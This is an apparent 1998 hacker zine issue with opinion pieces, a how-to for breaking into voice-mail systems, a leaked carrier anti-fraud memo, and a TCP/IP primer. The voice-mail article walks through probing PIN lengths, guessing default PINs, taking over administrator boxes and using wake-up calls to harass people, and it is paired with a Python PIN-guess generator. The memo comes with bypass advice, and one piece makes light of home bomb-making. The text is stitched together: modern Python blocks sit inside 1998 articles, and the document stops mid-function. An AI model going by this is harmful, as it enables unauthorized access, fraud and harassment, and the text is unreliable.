                  t h e   h a v o c   t e c h n i c a l   j o u r n a l

                         volume 2 . number 6 . issue 18

[January 1, 1998...............................................Happy New Year]
[......................'Putting the hell back in shell'......................]

[Table of Contents...........................................................]

  Contacts & Copyrights......................................Staff
  Editorial..................................................scud_
  The Way It Should Be.......................................shoelace
  Bringing Back the Old School...............................Revelation
  Hacking VMB Made Easy......................................SSS
  Fraud Force System.........................................D-Day
  An Introduction to the Internet Protocols..................scud_
  Windows NT Vulnerability Theories Version 2................vacuum
  Basic Network Architecture, Part II........................lurk3r
  blast.c....................................................memor
  sendmail885.c..............................................su1d
  sendmail885.c (2)..........................................scud_
  Scripting in UNIX..........................................Nartrof
  ttyread.c and ttywrite.c...................................simon
  The Mailroom...............................................scud_
  The News...................................................KungFuFox
  Reader Survey..............................................Staff

  ---->NEW Majordomo<----
  Subscribe to thtj at: majordomo@orc.ca
  'subscribe thtj you@your.isp'

[Contacts & Copyrights..................................................Staff]

[1. Contacts]

  Editor in Chief      : Scud-O
  Executive Editor     : KungFuFox
  Submissions Editor   : Keystroke
  Editing Assistants   : FH, Phrax
  News Editor          : KungFuFox
  Mail Editor          : Scud-O
  Webpage Editor       : Scud-O

  Extra Special Thanks : All the writers, and the people who filled out the
                         reader survey.
  Shout Outs           : All of you in the know.

  THTJ Website : http://www.thtj.com/
  THTJ e-mail  : thtj@thtj.com, scud@thtj.com

[2. Copyrights]

The HAVOC Technical Journal (THTJ) Volume 2, Number 6, Issue 18, January 1st, 1998. *Everything* here is (c) Copyright 1996, 1997, 1998 by THTJ, HAVOC Bell Systems Publishing, or HNS. All Rights Reserved. Nothing may be reproduced in whole or in part without written permission from the Editor in Chief. The articles included here belong to their writers, and are copyrighted by their writers. If you want to use their articles in your publication, ask them.

For more information on our copyrights and article submissions policy, please see http://www.thtj.com/submissions.html
For more information on legal stuff go to http://www.thtj.com/legal.html

[No copying THTJ, damnit.]

Articles, comments, whatever should be directed to: scud@thtj.com

Subscribe to thtj at: majordomo@orc.ca
'subscribe thtj you@your.isp'

Disclaimer: THTJ is provided free of charge, thus THTJ provides NO warranties whatsoever. You use this zine and its information at your own risk. While every effort has been taken to ensure the accuracy of the information contained in this article, the authors, editors, and contributors of this zine assume no responsibility for errors or omissions, or for damages resulting from the use of the information contained herein. The HAVOC Technical Journal does in no way endorse the illicit use of computers, computer networks, and telecommunications networks, nor is it to be held liable for any adverse results of pursuing such activities. [Actually, to tell you the honest to goodness truth, we do endorse that stuff. We just don't wanna get in trouble if you try it for yourself and something goes wrong.]

-------------------> 'It's Not Our Fault' <-------------------

THTJ is protected by the First Amendment of the US of A. If any of the information contained in this file offends you, then why the hell are you reading it? THTJ publishes its information to educate you; if YOU choose to use the information illegally, so be it. We are not responsible for *YOUR* actions. We merely provide the information. By reading this zine, you agree to this policy, and you void all rights to sue us or get us involved in the consequences of *YOUR* actions. If you can not deal with this policy, then delete this file now.

Stealing articles, or pieces of articles, or pieces of pieces of articles from thtj without permission is a crime against humanity. If you want to use any of the material in here, please contact THTJ and/or the article's author. If you do not follow these rules, we may be forced to take legal action.

NOTICE: if you are a government official or employee reading this file, you MUST register with thtj. A registration permit will be mailed to you free of charge by using either of the mail addresses above. A registration fee of $50 is required upon submission of the permit. This will entitle you to receive thtj via a private mailing list, or via snail mail on a 3.5" floppy disk. UNTIL you are officially registered, you MUST DELETE ALL COPIES of thtj that you have, either in print or on a computer. You CAN NOT read thtj until you are registered. This is *NOT* optional. If we detect .gov access from an unregistered person, we will have to take legal action.

[Editorial..............................................................scud_]

Ladies and gentlemen, boys and girls, feast your eyes on the new look of thtj. This will probably be the look for the next few issues, unless you mail us and say that you are going to kill us all because we aren't good at ASCII.
We are still going to be playing around with this format a bit, so your comments can help.

I would like to take some time out and address all of the reader surveys I have received. To the hundreds of you that replied, I thank you for your input, and I hope that the rest of you out there follow the lead of these people and fill out the survey. Those of you that did fill it out last month, feel free to fill out the form again and tell us how we are progressing.

A few of you that replied were sysadmins, and most of you said that you wish hackers understood that most of these sysadmins are hackers just like you and me. This is an important point. Many sysadmins out there are a hundred times better at hacking than a lot of the hackers out there. Some sysadmins are not really hackers and they hate hackers, thus messing up the rep for all sysadmins.

A lot of you also asked if I was interested in articles. The answer is YES! thtj lives off of the articles that you all submit to us. If it wasn't for all of you out there who submit articles, thtj would have dried up a long time ago. So, please help keep this zine going by submitting articles to it. If you would like to submit an article, please send it to me at scud@thtj.com. I will look the article over, and will try to get back to you, but if I don't, then the article either will or will not be in the next issue of thtj.

Well, I must get back to the Festivus and the feats of strength, so I will not be able to write a real important editorial this month, but go on and read shoelace's bickerings below.

[The Way It Should Be, Dammit........................................shoelace]

Alas, yet another lame article by shoefunk (yes, that is also Shoelace). This one is about how stupid the world really is when it comes to computers, hacking, phreaking, bomb making, well, just about anything.

Recently, I was reading 'Time Digital: Your Guide To Personal Technology', and came across a small dictionary page, where they defined a hacker as:

  "HACKER: A good guy gone bad. In the early days of computing, the term was applied to enthusiastic, Jolt cola-swilling programmers who lacked formal training. Increasingly, though, hacker refers to a kind of high-tech, disgruntled postal employee--one who breaks into and crashes corporate and government databases for the sheer hell of it--and for a little recognition too."

Although this is in some cases true, I see more cases of people doing it to prove a point. Whether it's to prove that they can do something, or to let their opinion out about something, the common 'hacker' will do the 'hack' for probably more than just the sheer hell of it. You should always try to prove a point with what you do, even if the point isn't gonna happen. It gets out faster, and more people will find out about it.

Next subject: phreaking. I don't know about you people out there, but why is it that if you can set up a teleconference, you are elite? I don't get it... just because you can go down to a local pay-phone and dial up ATT Voice Conferencing, post the information, and talk to people, you are really, really, really super. I'm not saying that a conf. isn't nice now and then, or that when someone sets one up you shouldn't thank them, but why worship them? It's just a conf. Why not take apart your phone and see why it works instead of bribing someone that if they set one up, they will be rewarded? It's much more gratifying to go and see why something works, rather than to charge major cost to someone else. So go unscrew your phone and pry it open.

Also, what do people think making a pyrodex bomb is gonna do? Just because you have a lb. of pyrodex in your room doesn't mean you're gonna blow up another Oklahoma Municipal Building type explosion. People should stop worrying about having fireworks and homemade explosions. My friends and I make lots of bombs, and have yet to blow up buildings or anything. It's just something to do.

So enough of all the bitching about Hacking/Phreaking/Bombs... just let whatever's gonna happen, happen. Let bombs go boom, PLEASE let phreaking become about understanding phones and why things happen, and for hacking, prove a point about why you do something. And for shoelace, shut up already.

-shoelace (shoe@beer.com) (http://www.public.usit.net/sltaylor)
-IRC: undernet - #terrorism, #deathmetal, #phreak

[Bringing Back the Old School......................................Revelation]

  0000000000000000000000000000000000000||
  0                                   0||
  0  BRINGING BACK THE OLD SCHOOL II  0||
  0                By                 0||
  0            Revelation             0||
  0            Hackers.Com            0||
  0                                   0||
  0000000000000000000000000000000000000||
   |||||||||||||||||||||||||||||||||||||

Many of you may have read my article "Bringing Back The Old School" in THTJ #12. It got a huge response and so I decided to write a follow-up on it, with more of my views and ideas on what the underground is becoming and what it should be. If you haven't read my previous article, I strongly suggest you do as a prelude to this.

The Internet was created to be a free place. A place where people can learn about anything and everything. Yet another tool that will change society for the better. But, there are always rebels. Rebels do as they please and refuse to abide by given rules that confine their hunger for knowledge. The Internet rebels gathered in a non-physical arena known as the underground. The underground is composed of hackers and phreaks and anyone with an interest in technology and the determination to learn as much as possible, regardless of the obstacles.

What is life about anyway? In my opinion, it's about learning. What else is there? There are material things that occupy most of our time, but what's it all for? Nothing. The only real thing is knowledge.
Someone with the determination to learn all they can regardless of the obstructions is a great asset to society in general. These are the people who create things that make life easier to live. These are the people who theorize and ponder about all that exists, simply because they want to. Knowledge is not a tangible thing, thus it cannot be taken away. There are many mediums used for the study and passing of knowledge; the computer is just one of them. Some people choose books, others television or radio; we choose the computer.

Hackers have gotten a distorted image for various reasons which I'm not going to go into, because what's done is done. Hackers originated as highly skilled computer programmers, and that eventually got distorted into computer criminals. Now, we are neither. What we are is information seekers. We just want to learn about all we can, because that's all that really matters in the long run. We want to learn about not only computers, but telephones, technology, government, the world in general, and life. We choose to pursue this knowledge by any means necessary, and on occasion, that may violate a law or two, but we hurt no one, we harm nothing. We are not criminals. As soon as the public understands that, we will finally be taken for what we are: people wanting to learn.

Knowledge is taken for granted these days. The underground has lost its sense of ethics, the ethics of knowledge seeking and non-destruction that I described above. The underground has become polluted with software pirates, email bombers, carders, virus spreaders, and anarchists. We must pull away from those things that corrupt the underground now, or they will eventually corrupt us few who still believe in the true underground. These unethical, immoral, and just plain stupid things must be stopped. And stopping them is easy, but getting everyone to cooperate is not.

We can stop these things by simply refusing to distribute the files that teach these things, because if you stop the flow of the unethical information, people will turn to the ethical because it's all that's left. Simply refusing to link to sites that distribute these files will help too. So that's all you have to do to help me and Hackers.Com realize our idea of the New School, a return of the Old School ethics: simply deny the information that is corrupting the underground.

Now, some of you may be thinking: "He stated that all information should be free and that all hackers want is to pursue information, but then he stated that we need to stop the flow of information. This doesn't make sense." Well, actually, it does. I understand what you're thinking, but you must try to understand what I'm thinking. We choose to pursue pure knowledge for the simple gain of more knowledge, nothing else. We get no material gain from our desire to learn. But, those who pirate software, card, etc. are gaining finances and causing destruction at the same time. I want to stop the flow of information that does nothing but damage, because this is not the information which we want to pursue. We want to pursue the information that creates knowledge, not destroys or corrupts it. It is easier to destroy than to create, but creating is much more rewarding.

So this is it...this is a major step towards realizing our dream of freedom, greatness, and ethics among the underground population. Our determination to get rid of software pirates, carders, virus spreaders, and anarchists who do nothing but destroy will overcome them...it's just a matter of time. I hope that the things I have discussed in this and my previous article are of some help to you in the underground and in life. Please study the things I have written, and think about them, and help me achieve the goal that I share with every other true hacker out there...bringing back the old school.
If you wish to further discuss these topics with me, or just comment on my article, you can do so by emailing me at: revelation@hackers.com

Or if you'd like more information on my ideas and my quest to bring back the Old School, you may visit my web site at: www.hackers.com

There you will find informational resources for the true hacker, and it will change your life forever. I will never give up...I hope the same is true for you.

Written By: Revelation
Hackers.Com
revelation@hackers.com
"Bringing Back The Old School"

[Hacking VMB Made Easy ...................................Super Sharp Shooter]
(mdma@cyberus.ca) (12/21/97)

Voice Mail Boxes (VMBs), I would say, are the best way to keep in touch, give info, or just say hi to someone other than email. But the fun thing with VMBs is that most of them are on 1-800 numbers, so you can call them up or check them from any payphone (for free!) or from anywhere in the world.

How do VMBs work?

VMBs are basically computer systems, with passwords, menus, and users with permissions, and so on. But it is all done by voice and DTMF tones. Just like computer systems, there are many different VMB systems out there, some stronger than others, some not. Think of an answering machine, but all digital, with hundreds of them on one box.

The first step is finding a VMB system; there are hundreds of 1-800 VMBs out there waiting to be hacked. Pick up a phone (a speaker phone works best) and start hand-scanning: 1-800-111-0001, 0002, 0003, and so on. You should only hand-scan after business hours. The best ones are small businesses; when you get to one (after hours) you should hear something like "Hello, welcome. If you know your party's ID box number (or PID, or ext.) you may dial it now." BINGO, you got one. Try out all the menus and get a feel for the system.

OK, I found a VMB system, now what?

First you have to get to the VMB system itself (after all, this is a computer running more than just VMBs). Most of the time it's '#' or '*' as soon as you hear the MAIN welcome message of the company. Next you have to know how long the box numbers are. You can find this out by going to the main menu, where you should hear something like "If you want to hear the directory of people (users), press #". Hit # and listen to the listings, for example "John Doe, box 546... Jonny Down, box 538" and so on. Most systems have 3-digit box numbers, and the super-user usually places the users in groups, like 2XX for the marketing section, 6XX for accounting and so on, so listen and write down all the groups when listening to the directory list. If you hear that the 2XX group is active, listen for the last box number in the group and write it down. Most of the time sysadmins add extra boxes so they can add users to the group later. The extra ones will be your target. Why? Well, an unused box is easier to get into, and when you get one it will take a lot longer for the sysadmins to find out that you hacked a box on the system. The main goal is to find an EMPTY box.

After you have found an empty box, the next step is the longest, and you need luck. All VMB systems have default settings; for example, when you set up a box (as the sysadmin) the password could be the same as the box number, i.e. box 123, password 123. First you have to find the length of the password. You can do this by putting in the box number first; it will then ask you for the password (or PIN). Press the 1 button (it doesn't have to be the 1 button), then wait a few seconds, then 2... wait... then 3... wait. Keep doing this until the lady says "Wrong PIN number, please try again!" Just make sure you do it slowly: the system rejects the PIN as soon as it has all the digits it expects, so the number of digits you got in before the rejection is the password length.

Now that you know the password length, here are some common defaults you should try first:

  1) same as box      -=- box is 902, try 902 for the password
  2) reversed         -=- box is 902, try 209
  3) box plus 1,2,3+  -=- box is 902, try 9021, 9022, 9023, etc.
  4) the year         -=- 1997, or 1998, whatever year we are in

More:

  _4 digit passwd_   _5 digit passwd_   _6 digit passwd_
        0000               00000              000000
        1111               11111              111111
        2222               22222              222222
        3333               33333              333333
        4444               44444              444444
        5555               55555              555555
        6666               66666              666666
        7777               77777              777777
        8888               88888              888888
        9999               99999              999999

And the list goes on and on... just use your head. Try things like 1234 and 4321, and look at your telephone keypad for patterns. Just don't give up.

I GOT ONE!! Now what?

Once you get into a box you will hear a number of menus. The first thing you should do is check to see if there are any new or saved messages on the box; if so, listen to them and pay attention to the dates of the messages. If you have found an empty box you don't have to worry about this, but if you got into someone's box this is important. If the dates on the messages are old (i.e. 1+ months) then there is a good chance that your new box will not get killed, but if the messages are a few days (or hours) old then don't mess with anything and try to hack a new box. If you screw with that box, like deleting messages or changing the password on the box, the owner will tell the sysadmin and you will lose it anyway, and then the sysadmin knows that hackers are trying to break into the system.

Once you feel that the box you have is safe, it's up to you what to do. Change the voice greeting message, the password; some VMB systems have wake-up calls, which is wicked: think about it, you can put in ANYONE's phone number in North America and a time (i.e. 4:00am) to wake them up, or piss them off. Just look around on each menu to get a feel for it. Most of the time sysadmins are box number 999 or 998. So if you're lucky and can hack a sysadmin box you can make new groups, and new boxes for all your friends. If you do hack the sysadmin box, just make a few boxes and leave; don't change the sysadmin's password or delete any messages.

Play Safe, and Have Phun.
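The default-PIN list above, turned into code as an added example (this is not from the original article). It generates the article's guesses (box number, reversed box number, box number plus a digit, the year, repeated digits, and keypad runs such as 1234 or 0987) for a given box number and PIN length, most box-specific first and de-duplicated, and adds the administrator's side of the same problem: a check that tells you whether a box is still sitting on a guessable PIN. The box numbers and years used are made-up sample values; the generator also covers keypad runs generally rather than only the two the article names.

```python
"""Default-PIN candidate list for voice-mail boxes (added example)."""

DIGITS = "0123456789"
RUN_UP = "01234567890"        # wraps so that 7890 and 8901 also count as runs
RUN_DOWN = RUN_UP[::-1]


def candidate_pins(box: str, pin_len: int, years=("1997", "1998")) -> list:
    """Guesses worth trying first for `box`, most box-specific first.

    `years` are sample values (the article says: whatever year it is).
    """
    if not box.isdigit() or pin_len < 1:
        raise ValueError("box must be DTMF digits and pin_len at least 1")
    guesses = []
    pad = pin_len - len(box)
    if pad == 0:
        guesses += [box, box[::-1]]                   # 1) same as box, 2) reversed
    elif pad > 0:
        for d in "1234567890":                        # 3) box plus 1, 2, 3 ... (and reversed box)
            guesses.append(box + d * pad)
        for d in "1234567890":
            guesses.append(box[::-1] + d * pad)
    else:
        guesses += [box[:pin_len], box[-pin_len:]]    # PIN shorter than box: its two ends
    for y in years:                                   # 4) the year, cut to the PIN length
        if pin_len <= len(y):
            guesses.append(y[-pin_len:])
    guesses += [d * pin_len for d in DIGITS]          # 0000, 1111, ... 9999
    for run in (RUN_UP, RUN_DOWN):                    # 1234, 4321, 7890, 0987, ...
        for i in range(len(run) - pin_len + 1):
            guesses.append(run[i:i + pin_len])
    seen, ordered = set(), []                         # de-duplicate, keep order
    for g in guesses:
        if len(g) == pin_len and g not in seen:
            seen.add(g)
            ordered.append(g)
    return ordered


def is_weak_pin(box: str, pin: str, years=("1997", "1998")) -> bool:
    """Admin-side check: True if a box's PIN is one the list above would find."""
    return pin.isdigit() and pin in candidate_pins(box, len(pin), years)


if __name__ == "__main__":
    # Sample run on made-up box 902 with a 4-digit PIN.
    for pin in candidate_pins("902", 4):
        print(pin)
    print("9021 weak:", is_weak_pin("902", "9021"))
    print("4710 weak:", is_weak_pin("902", "4710"))
```

Run against an export of box numbers and PINs, `is_weak_pin` is the audit an administrator wants: every box that comes back True is one the article's procedure would open in a handful of calls, so those are the ones to reset first, and the fix is to stop provisioning boxes with PINs derived from the box number at all.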
Super Sharp Shooter -+- 1.800.234.1136 BOX 999
"Phreaking For Phun"
http://www.cyberus.ca/~mdma/phreak
NPA 613

[Fraud Force System.....................................................D-Day]

Century Cellunet's New "Fraud Force System"
Technical Interoffice Data

People in Baton Rouge, New Orleans, Louisiana and surrounding towns may find some use in the following file. It documents the structure of the "Fraud Force" system being implemented into these locations' cell sites and switches. It is unknown if it will affect landline systems, but from the way it works, it is doubtful.

EOC---------------------------------------------------------------------EOC

Interoffice Memorandum

Date: February 18, 1997
File: FRAUDFOR
To: Div/Dist Managers, Office Managers, Chris Nolen, Barry Gugliuzza
FROM: Phyllis May
SUBJECT: Fraud Force Use In Fraud Markets

Laura Graham developed the following procedure for the Customer Service Center to be used when customers are using the phones in high fraud markets where Fraud Force has been implemented. The following details are unique to Region 1 and the Fraud Force implementation. Fraud Force will start with the Baton Rouge system the week ending Feb 28. Other markets will be added as needed. All Louisiana, Arkansas and Texarkana cellulars in this system will be routed through Fraud Force. Calls will be routed to Customer Service. Please direct any questions to Jim Burnham at 318/683-3429 or Rhonda Woodard at 318/683-3427.

(page 2)

Overview:

Purpose: FraudForce is a system implemented by Century to help combat cloning fraud for our customers roaming in high fraud areas. Affected markets will be included as needed, those which are found to have high fraud rates.

(page 3)

Following is an overview of the verification process for Century customers using cell service for the first time in a FF market. For detailed instructions, see "Verification Process".

Step | Action

1. Customer places first call to any number.
2. Call is routed (hotlined) to FraudForce, where an Interactive Voice Response (IVR) prompts the user to enter their 10 digit cell number, ending with the pound key, which is then verified. The customer has three (3) tries to enter their number correctly.
3. Call is transferred to Century Cellunet's customer service center.
   - Valid customers will continue to step 4.
   - Invalid customers are instructed to make another call and re-enter the correct cell number.
4. The customer information is verified to confirm the cell user is valid.

   | If Information Is | The CSR                                        |
   |-------------------|------------------------------------------------|
   | verified,         | explains the call credit and the procedure to  |
   |                   | establish a PIN. Go to step 5.                 |
   | not verified,     | presses 0 on their keypad to transfer to a     |
   |                   | recording explaining the caller is denied.     |

5. The CSR presses 1 to transfer the call to the FraudForce IVR, and the customer interactively uses their phone keypad to establish a 4 digit PIN.
6. If a billed call, the CSR notes the length of the call and credits the customer's account (length of call X roaming airtime rate) to AFDFC. This is because the customer incurred airtime charges during verification and PIN selection.

(page 3)

ESTABLISHING AND USING A PIN

Hours accessible: Any normal working hours. Customers after hours will be directed to call during normal hours.

Call types: There are two types of FraudForce calls.

Fraud Force 1   These are calls where the customer entered a valid 10 digit cell number when prompted after the initial hotline. These are customers who had previously established a PIN, however entered it incorrectly and must repeat the verification process, or who are making their first call in the FraudForce market, verifying for the first time.

Fraud Force 3   These are calls where the customer entered an invalid 10 digit cell number or pressed zero (0) for assistance (the customer has three tries to enter their cell # correctly). The customer can not be verified without entering a valid 10 digit number. They are instructed to attempt the call again, so they receive the IVR prompts to enter the 10 digit number correctly.

PIN DETAILS:

The PIN is four digits and should not start with zero. The PIN is not accessible to Century. The customer must remember their PIN. Once established, the PIN is valid in that market until Century removes it and the customer calls the IVR to establish a new one. This can be done if the user forgets their PIN or if the usage/user appears to be fraudulent and Century needs to block service. A PIN must be established in each FraudForce market. The same PIN may be used in every FraudForce market, or different PINs may be used. Different customers MAY have the same PIN. The customer will periodically be asked to enter the PIN before making a call. A user has 3 tries to enter the PIN correctly. On the 4th try, the call will be directed to Fraud Force 1.

(page 4)

VERIFICATION PROCEDURES

The following are the procedures for a FraudForce 1 call.

1. Customer first places call to any number.
2. Caller is hotlined to FraudForce, where an IVR prompts the user to enter their 10 digit cell phone number and the pound key.
3. When entered correctly, the call is transferred to Century's customer service center, with the following introduction: "Please verify your 10 digit cellular number. Press any key to accept this call."
4. The CSR presses any key on their phone to accept the call and says to the caller: "Century Cellunet, this is (name). You are currently roaming in a high cellular fraud area. For your protection and ours, will you verify some account information to enable you to establish a Personal Identification Number, or PIN."
5. Important: Customer information must be verified to confirm the account holder, secondary authorization holders, or business account cellular users are valid before they are given access to establishing a PIN.

   Individual Accounts:
     What city are you currently in?
     What is your mobile number?
     What is your name?
     If user differs from account name: What is the name on the account?
     What is your Social Security Number?
     If the Social Security number is not verified, verify one of the following:
       What is the account's billing address?
       What is your home phone number?
       What is your work number?

   Business Accounts:
     What city are you currently in?
     What is your mobile number?
     What is your name?
     What is the account name?
     What is the account's billing address?
     The general billing address is okay; if not verified at all (customer does not know), verify the following:
       What is your work phone number?

(page 5)

6. If information is verified: "Thank you for your cooperation. [If a billed call:] You will receive credit for this call. [If a free call:] This is a free call. I am now returning you to the system so you can set up your PIN." The CSR presses 1 on their keypad to transfer to the FraudForce IVR so the customer can establish their PIN.

   If information is NOT verified: "I am unable to authorize the information you have given"; the CSR then presses 0 on their keypad to transfer the call to a recording explaining the call is denied. (No, do not give out account information.)

7. The CSR tickles the customer's account using an action code of PENDF. Include the 10 digit cellular number, FF, and whether or not the customer was verified.

(page 6) (End of Memo)

I would have typed the rest of this file, but it's just basically a list of customer questions and alternate places for the caller to be transferred. Nothing you pretty much need to know about the system, but if you keep a copy of this on hand, you may be able to bypass it. You have what the operator is looking at; you know what she's going to do. Use this information, don't flaunt it. Century is a good corporation, but sometimes you need a cell! Remember, if updates to this file are made, I will be sure to send them out to the public.

UPDATE: I have just discovered that FraudForce is now being implemented in almost all cities around the country that use Century. Now this is a serious problem.

[An Introduction to the Internet Protocols..............................scud_]

It seems that everyone is covering this topic for an article, so I figured that it was high time that I toss my hat into the ring and muck things up a bit more. This is merely an introduction, so I am not going to go into the formats for TCP and UDP headers and packets, well, at least not in this version of this document. TCP/IP and all of the other Internet protocols take up whole books (and volumes of books) to fully explain. If you want to learn more, check out the local B&N or Borders, and pick up a book on TCP/IP.

[Editor's Note: The deadline for this issue came up too fast, so I was unable to finish this whole text. There is still a good intro to TCP and UDP, so read it, and next month I will hopefully complete this Introduction with the rest of the gang of Internet Protocols.]

The Internet is the world's busiest and the only truly worldwide network for all types of computers and people to use. What follows is an introduction to the protocols that make the Internet work. There is a wide range of protocols that the Internet uses to connect computers all over the world. However, since the Internet grew up on UNIX, the UNIX networking standards are what the Internet mainly uses to connect computers together. These protocols are often referred to as TCP/IP, for Transmission Control Protocol/Internet Protocol. This is really two parts: TCP is an upper layer for data transport, and IP is a lower level network layer, but more on this in a bit.
Although several other methods are used for other services, TCP/IP is the most commonly used protocol grouping, so we will cover TCP/IP first. Before we delve into TCP/IP, we must first understand the model that the Internet's protocols are developed on. Welcome to OSI. -ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ OSI - The Open Systems Interconnect Reference Model -ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ The Open Systems Interconnect (OSI) Reference Model was part of a project by the International Organization for Standardization (ISO). The ISO OSI network protocol architecture scheme never really caught on, but the TCP/IP protocol uses the basic groundwork that OSI started. The model consists of 7 layers, with each layer building on the layers below it, and providing specific functionality. Each layer has its own unique characteristics, and as a whole, the OSI model enables network communication. The software implentation of such a layered model is appropriately termed as a protocol stack. User applications insert information into one layer and each layer specially encapsulates the data until the bottom layer has been reached, and this physical layer moves the data down the line to its destination, occasionally having the layers translated from the bottom up as the data is transported. The OSI Model looks like below: ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 7. Application Layer ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ 6. Presentation Layer ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ 5. Session Layer ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ 4. Transport Layer ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ 3. Network Layer ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ 2. Data Link Layer ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ 1. Physical Layer ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ The layers have specific roles as I have said, each refraining from intruding into the domains of the other layers. The Units exchanged are the units of information that is passed in that layer. 
o Application Layer: Contains the network applications with which people interact, such as mail, ftp, rlogin, etc. Units exchanged: message
o Presentation Layer: Creates common data structures, so that both ends agree on how the data is represented. Units exchanged: message
o Session Layer: Manages connections between network applications. Units exchanged: message
o Transport Layer: Ensures that data is received exactly as it was sent. Units exchanged: segment
o Network Layer: Routes data through various physical networks on its way to a known host. Units exchanged: packets
o Data Link Layer: Transmits and receives packets of information reliably across a uniform physical network. Units exchanged: frames
o Physical Layer: Defines the physical properties of the network, such as voltage levels, cable types, interface pins and other such fun things. Units exchanged: bits

-──-────────────────────────────────────────────────────────────────────────
The TCP/IP Network Model
-──-────────────────────────────────────────────────────────────────────────

The OSI model informs an understanding of the TCP/IP communication architecture. When TCP/IP is viewed as a layered model, there are usually 4 layers that are seen to compose TCP/IP:

o Application
o Transport
o Network
o Link

As with OSI, each TCP/IP layer has its own unique job:

Application Layer: Network applications depend on the definition of a clear dialog. In a client-server system, the client application knows how to request something, and the server knows how to respond to that request. Examples of this include FTP, HTTP, etc.

Transport Layer: The transport layer gives network applications channels with clearly defined characteristics (reliable or not, stream or message oriented) over which to exchange data. The two protocols within the TCP/IP suite that implement this layer are TCP (Transmission Control Protocol) and UDP (User Datagram Protocol).
Network Layer: The network layer allows information to be transmitted to any machine on the contiguous TCP/IP network, regardless of the different physical networks that intervene. The Internet Protocol (IP) is the common mechanism for transmitting data within this layer.

Link Layer: The link layer consists of the low level protocols used to transmit data to machines on the same physical network. Protocols that are not part of the TCP/IP suite, such as Ethernet, Token Ring, FDDI, ATM, etc., implement this layer.

A two-system TCP/IP connection would look something like this:

System 1 (client)                                        System 2 (server)
┌─────────────┐                                            ┌─────────────┐
│ Application │                                            │ Application │
└─────────────┘                                            └─────────────┘
┌─────────────┐                                            ┌─────────────┐
│  Transport  │                                            │  Transport  │
└─────────────┘                                            └─────────────┘
┌─────────────┐                                            ┌─────────────┐
│   Network   │                                            │   Network   │
└─────────────┘                                            └─────────────┘
┌─────────────┐                  Physical                  ┌─────────────┐
│  Data Link  │<------------------------------------------>│  Data Link  │
└─────────────┘                  Network                   └─────────────┘

Data within these layers is encapsulated with a common mechanism: each protocol has a header, carrying meta-information such as the source, the destination and other important attributes, and a data portion that contains the actual information. The protocols from the upper layers are encapsulated within the data portion of the lower ones. When traveling back up the protocol stack at the receiver, the information is unwrapped again as it is delivered to each layer.
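To make the encapsulation concrete, here is an added example (not code from the article) that builds a TFTP data packet inside UDP, inside IPv4, inside an Ethernet frame, then parses it back one layer at a time, checking the IP header checksum, the UDP checksum and the frame trailer as it goes. The MAC addresses, IP addresses and port numbers are made-up sample values; the TFTP DATA opcode (3) comes from RFC 1350. The 4-byte trailer is a CRC-32 computed with zlib.crc32 standing in for the frame check sequence that a network card normally appends itself.

```python
"""Build the Ethernet/IPv4/UDP/TFTP frame from the encapsulation example and
parse it back one layer at a time. Added example, not from the article."""
import struct
import zlib

# Constructed sample values: addresses and ports are assumptions, not from the article
SRC_MAC, DST_MAC = bytes.fromhex("00c04fc48c9d"), bytes.fromhex("0000c0123456")
SRC_IP, DST_IP = "168.143.27.120", "168.143.27.1"
ETHERTYPE_IPV4, PROTO_UDP, TFTP_DATA = 0x0800, 17, 3   # TFTP opcode 3 = DATA (RFC 1350)


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum used by the IP header and UDP; a header
    that already carries a correct checksum sums to 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def build_frame(payload: bytes, block: int = 1, sport: int = 1024, dport: int = 69) -> bytes:
    """Wrap payload in TFTP DATA, UDP, IPv4 and Ethernet headers (outermost last)."""
    tftp = struct.pack("!HH", TFTP_DATA, block) + payload            # 4-byte TFTP header
    udp_len = 8 + len(tftp)
    udp = struct.pack("!HHHH", sport, dport, udp_len, 0) + tftp      # checksum field 0 for now
    pseudo = ip_bytes(SRC_IP) + ip_bytes(DST_IP) + struct.pack("!BBH", 0, PROTO_UDP, udp_len)
    udp_ck = checksum(pseudo + udp) or 0xFFFF                        # a result of 0 is sent as 0xFFFF
    udp = udp[:6] + struct.pack("!H", udp_ck) + udp[8:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + udp_len, 0x1234, 0x4000, 64,
                     PROTO_UDP, 0, ip_bytes(SRC_IP), ip_bytes(DST_IP))
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]         # fill in header checksum
    body = DST_MAC + SRC_MAC + struct.pack("!H", ETHERTYPE_IPV4) + ip + udp
    fcs = struct.pack("<I", zlib.crc32(body))   # stand-in for the 4-byte FCS the NIC appends
    return body + fcs


def parse_frame(frame: bytes) -> dict:
    """Peel the layers off in the opposite order, verifying each one."""
    body, fcs = frame[:-4], frame[-4:]
    if struct.unpack("<I", fcs)[0] != zlib.crc32(body):
        raise ValueError("bad frame check sequence")
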